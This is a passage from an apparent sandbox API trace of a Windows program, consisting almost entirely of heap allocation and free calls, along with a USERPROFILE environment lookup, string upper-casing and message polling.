RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0258.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0258.505] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0258.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0258.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa898 [0258.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.505] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0258.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0258.507] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa958 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa898 [0258.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0258.508] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0258.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0258.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0258.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0258.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0258.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17e8 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0258.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0258.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0258.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0258.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.520] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0258.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.521] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0258.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.521] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.521] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0258.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0258.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0258.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0258.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0258.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0258.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0258.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.523] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0258.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0258.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0258.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0258.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0258.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0258.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0258.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0258.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0258.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0258.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0258.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0258.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.525] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0258.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.526] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 